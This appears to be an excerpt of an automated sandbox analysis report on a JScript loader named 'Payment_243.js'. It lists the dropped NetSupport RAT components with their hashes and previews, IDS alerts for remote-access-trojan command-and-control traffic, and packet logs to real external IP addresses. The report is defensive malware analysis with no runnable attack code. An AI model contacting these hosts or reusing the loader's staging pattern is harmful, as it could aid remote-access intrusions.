SSDEEP:	384:PlBJHEA29f27X0JS4zuPxpO8psP+E7v6xKL:P9b29f27kJSAuPxpO6sP+E7yxKL
MD5:	8028AB84D61FC5E00FEEA816E1D1E293
SHA1:	73F6340BE4C6B5AF09673DACDF1AAB7405B966AA
SHA-256:	3F2EB6455F54365C27829F85DD64CA0BAFAA8577A6C8E79A54A6DD4C67DF6470
SHA-512:	276DF846F72F2B410852F0709F3EFFD853C3B012E94A6A3DFFB364F9597D4CCFE453B6533CE7A67C9DCE5B829C0F96E9838A267269687213D996B60591C586F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8" standalone="yes"?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Corporation" Comments="MF tracing profile" Company="Microsoft Corporation" Copyright="Microsoft Corporation" Tag="MFTrace">.. <Profiles>.. <EventCollector Id="EventCollector_Camera_MF_Trace" Name="MFTrace Event Collector">.. <BufferSize Value="1024" />.. <Buffers Value="3" PercentageOfTotalMemory="true" MaximumBufferSpace="192" />.. </EventCollector>.. <EventProvider Id="AuthUX_1" Name="3ec987dd-90e6-5877-ccb7-f27cdf6a976b" />.. <EventProvider Id="AuthUX_2" Name="41ad72c3-469e-5fcf-cacf-e3d278856c08" />.. <EventProvider Id="AuthUX_3" Name="4f7c073a-65bf-5045-7651-cc53bb272db5" />.. <EventProvider Id="AuthUX_4" Name="a6c5c84d-c025-5997-0d82-e608d1abbbee" />.. <EventProvider Id="AuthUX_5" Name="c0ac3923-5cb1-5e37-ef8f-ce84d60f1c74" />.. <EventProvider Id="AuthUX_6" Name="df350158-0f8f-555d-7e4f-f1151ed14299" />.. <EventProvider Id="Aut

C:\ProgramData\x225qa0\guarantee\external_extensions.json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.678249360262278
Encrypted:	false
SSDEEP:	6:jN+SboYZlqqRQJOBF1Fi9MO8jCaMbNW7KuW/4kutLwyAGI/V6s:jN+oo6lqqRNhFi9MO6EW7XFVLqGO6s
MD5:	708428751D01199ED5F53E0FB2AD4BF0
SHA1:	93F563A090F7EE511D8774C8AF4F8FF46F0D66E6
SHA-256:	579032CB7B7BEA083E077BA85CB62DC231BA672F93CE1B55A379968FB3C2CEE9
SHA-512:	4A75EEAA2A973D7F726DD10E7769A22E9FDD084D9EC8A1CBA742FBB66F0A6A6343421C9FDF58C61B91920D2F3DCC99C705A2844D33B53F8FCF3D38A909B5A00B
Malicious:	false
Preview:	// Dictionary of default apps to install into new profiles. They will be.// dynamically downloaded and installed from CWS on profile creation..{. // Drive extension. "ghbmnnjooekpmoecnnnilnnbdlolhkhi" : {. "external_update_url": "https://clients2.google.com/service/update2/crx". }.}..

C:\ProgramData\x225qa0\install\5B8FEB2AF817493Es

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	46460
Entropy (8bit):	7.996244892825645
Encrypted:	true
SSDEEP:	768:8fAM/r+Jh0uwbtWlaaN6+H+aL6FsMSWGuPOLGIankYdaEqT4pKAdzSag3ZQr7WqM:8DrKh3wblLlJVzGykYdaC1WYWqGh
MD5:	D224C335C82ACAA733441CE43E59C881
SHA1:	FFC9502870FFBC116A44AE491306B7F6903D25B8
SHA-256:	F3E8FF2CA65192446A62D85B75C8C75C105CFBB7B17A8FA67F9A0C6E87EF3EC0
SHA-512:	D57A7902B2003B751796F2CFA1BFE4AD90A393BB1F68CE354B6D24B749937469AA8FBEE77838FC6BFFD83DC13D799C8C078783FFE236A1558B8900F71AFFAFE5
Malicious:	false
Preview:	TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......asi........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]\|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....\|..t......&8u....xL.Y$.)..Z4At...W......Z*..z7.'2.m...ZO...)..w ..:.L.gp.....y...6.....i..AS....-.V.7{.O..C..... ...?V$..NP........'..v){.pk....TV.UQ?'.a.h...eZYy....F...q/O.\....

C:\ProgramData\x225qa0\install\5F3010ACA99103ABs

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	125324
Entropy (8bit):	7.998476693287313
Encrypted:	true
SSDEEP:	3072:M+uqGKz72juA1+hbRI2QG6Btjjo6fiZZ86cNdbt:M+uqdvZndRIZPE6scN
MD5:	74C052D8AF6C37EBA1FBF76663A8522E
SHA1:	9315AE6AEB3E913F053D53A1F7EA1A29692E90E7
SHA-256:	5110690167DBB46389FF5792EB2672ED41EA5983382207D1E365C4634E620B7E
SHA-512:	A8ACA06CAF290F879E8DAA672A681D53F191E8F03C90BAFB49856616248205B33A8C466DC25D81FE215F0D66E42F2D7221075250B3BE6C4299491CCAFDE08220
Malicious:	false
Preview:	TDF$PrL....pb ...8'[.tt).$b..G...k.X1...}(.50.........qZ!G.A..?..=.ZN..>.).....:.........O..!%.pw....y).UK......v.}v.K...)q..z?.G(..`..<....jy...Ojz?y......!&....j.bO.!../..7...2P...GQ......}!.>..b".\i...g...U.S..g.,..tW.........m.,9..8.S.+.....F)..b7.P..+..1..M.d-.v.u.W^./...Vb.2.E.......8kn..sK.SL.S..lPA4..Z.K3....{.7y..U.F.L[...V2t.q.U...n...C..Pn..H..bb..<.........f.^.K/d.\........o.hw....l..In[Oa....H.<..nW..+H... ..x.%y..\|..^.?....\.G.X.......q....:.D.EE..Z.x....3..K...)......0.....(...{.W.;bw.Xtj...u.m...No.t...g.Q...V)..O..{po.@9.....e...i.p.}sN.J...(.j_V...f.EF..Sj.^....q.....W..7...^.I...%..R&..8K..^N..;.b.`X....N/S....z....e..K.ORI.gc......;.n.q9.}^.........zL.T0.....-.H...I..Pv.349k.q.$.U.u.6w..m..ar.CX.....:$V;^..............OO...F..........%cxnbqE'\...+.."...u..`...`n....z..Hw.W$.$.......i........X..1D.M.....%..g....V7J..'.b.+)?...e...-... ...;.....%....;....3s.p...L..\|/*.a.................F@.2nl.K.o-7.0,.h.k...

C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.98505637818331
Encrypted:	false
SSDEEP:	384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
MD5:	3B9D034CA8A0345BC8F248927A86BF22
SHA1:	95FAF5007DAF8BA712A5D17F865F0E7938DA662B
SHA-256:	A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
SHA-512:	04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\install_state.json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	3.5509498109363986
Encrypted:	false
SSDEEP:	24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
MD5:	3F78A0569C858AD26452633157103095
SHA1:	8119BCC1D66B17CCD286FEF396FA48594188C4D0
SHA-256:	D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
SHA-512:	89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
Malicious:	false
Preview:	//353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

C:\ProgramData\x225qa0\msvcr100.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\nskbfltr.inf

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\ProgramData\x225qa0\nsm_vpro.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\ProgramData\x225qa0\pcicapi.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.7376663312239256
Encrypted:	false
SSDEEP:	768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
MD5:	34DFB87E4200D852D1FB45DC48F93CFC
SHA1:	35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
SHA-256:	2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
SHA-512:	F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\remcmdstub.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63864
Entropy (8bit):	6.446503462786185
Encrypted:	false
SSDEEP:	1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
MD5:	6FCA49B85AA38EE016E39E14B9F9D6D9
SHA1:	B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
SHA-256:	FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
SHA-512:	F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\webmmux.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	265816
Entropy (8bit):	6.521007214956242
Encrypted:	false
SSDEEP:	3072:MW218gr7s2yIHB0pTPdTX9zUbEbStE97zjAs1RtTcJTfIv0se7POWu/HgsGU1VTl:MWSfr7sXSmPDbKPJ6/AsNk+1x
MD5:	49C51ACE274D7DB13CAA533880869A4A
SHA1:	B539ED2F1A15E2D4E5C933611D736E0C317B8313
SHA-256:	1D6407D7C7FFD2642EA7F97C86100514E8E44F58FF522475CB42BCC43A1B172B
SHA-512:	13440009E2F63078DCE466BF2FE54C60FEB6CEDEED6E9E6FC592189C50B0780543C936786B7051311089F39E9E3CCB67F705C54781C4CAE6D3A8007998BEFBF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@~..!..!..!...p...!...p..!...p..+!..M...!..M...!..!...!..M...!..s..!..s..!..s..!..s..!..Rich.!..................PE..L...{..T...........!.........N.......k.......................................0..............................................4...x.......................X......../..................................Ha..@...............l............................text............................... ..`.rdata..v...........................@..@.data....B......."..................@....rsrc...............................@..@.reloc.../.......0..................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\webmvorbisencoder.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	880216
Entropy (8bit):	5.239371133407635
Encrypted:	false
SSDEEP:	12288:vTAPYZEyRr+NDnaLyx2lz8MSjtX08pYRc29qcQmsGahsQZsbRN9S:YYF+Eyx2lzujtEIYRc1cQmsGa7ON9S
MD5:	642DC7E57F0C962B9DB4C8FB346BC5A7
SHA1:	ACEE24383B846F7D12521228D69135E5704546F6
SHA-256:	63B4B5DB4A96A8ABEC82B64034F482B433CD4168C960307AC5CC66D2FBF67EDE
SHA-512:	FB163A0CE4E3AD0B0A337F5617A7BF59070DF05CC433B6463384E8687AF3EDC197E447609A0D86FE25BA3EE2717FD470F2620A8FC3A2998A7C3B3A40530D0BAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A....u...u...u..C$G.3u..C$y.Iu..C$x..u...V..u...S..u...u..ju...H..u...'}.&u...'D..u...'C..u...'F..u..Rich.u..........................PE..L...s..T...........!.........R..............0......................................:W....@.........................`...........d....P..p............R..X....`...D......................................@............0..T............................text...}........................... ..`.rdata.......0......."..............@..@.data...\|<..........................@..._RDATA.......@......................@..@.rsrc...p....P......................@..@.reloc...D...`...F..................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xxx[1].zip

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2845498
Entropy (8bit):	7.997717653428638
Encrypted:	true
SSDEEP:	49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
MD5:	4C1AFE882E6D7C945A8397DCB02A2478
SHA1:	85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
SHA-256:	67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
SHA-512:	A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
Malicious:	false
Preview:	PK........DwZ................install/PK.........P)Z..Q~....\|.......install/5B8FEB2AF817493Es.....TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......asi........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]\|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....\|..t......&8u....xL.Y$.)..Z4At...W......Z..z7.'2.m...ZO...)..w ..:.L.gp.....y...6

Static File Info

General

File type:	ASCII text
Entropy (8bit):	5.508101926235647
TrID:
File name:	Payment_243.js
File size:	5'736'023 bytes
MD5:	19cef6a2f4055703922f3e8fd2c92fb9
SHA1:	e6ccef88b3cbba0424a39edab01697716fd8d813
SHA256:	d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
SHA512:	0976d92c923aa47d9667c8881f32217fa78ca8b60ed7963adf332ce3874699abc69d86610a25d51f228e6fd801e9358bc22ec1e06dfb2fa32b9efaa153c53b54
SSDEEP:	49152:v7DIzjCxbxqHlpM1MNN0D6hO22DzhYzYBmv9+8pJm3hp/KP1G6C+3qUxc8g7cEXQ:C
TLSH:	70465A0DAEF70091A923313C8FAF680AB674801B1509DD147D9DA3945FA953867FEFE8
File Content Preview:	./. Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you u

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T16:21:07.992710+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.22	49166	185.157.213.71	443	TCP
2025-01-14T16:21:08.602563+0100	1810004	Joe Security ANOMALY Microsoft Office HTTP activity	1	192.168.2.22	49165	45.155.249.215	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:21:07.992710114 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:07.997627020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:07.998229027 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.003062010 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.007947922 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602437019 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602452993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602464914 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602525949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602538109 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602562904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.602562904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.602574110 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602585077 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602591038 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.602596045 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602629900 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.602629900 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.602715015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602725029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.602756977 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.607434988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.607470036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.607481956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.607501984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.607505083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.607505083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.607515097 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.607531071 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.607664108 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.607871056 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.607939005 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689152002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689177990 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689214945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689244032 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689244032 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689268112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689280987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689308882 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689312935 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689476013 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689749956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689812899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689820051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689821959 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689861059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689861059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.689943075 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.689954996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690133095 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.690133095 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.690687895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690720081 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690753937 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.690753937 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.690875053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690886021 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690896988 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690907955 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.690916061 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.690956116 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.690956116 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.691536903 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691606045 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691618919 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691625118 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.691656113 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.691656113 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.691679001 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691921949 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691932917 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691943884 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.691943884 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691960096 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691971064 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.691973925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.691982985 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.692003965 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.692003965 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:08.775940895 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.775964022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:08.775978088 CET	80	49165	45.155.249.215	192.168.2.22
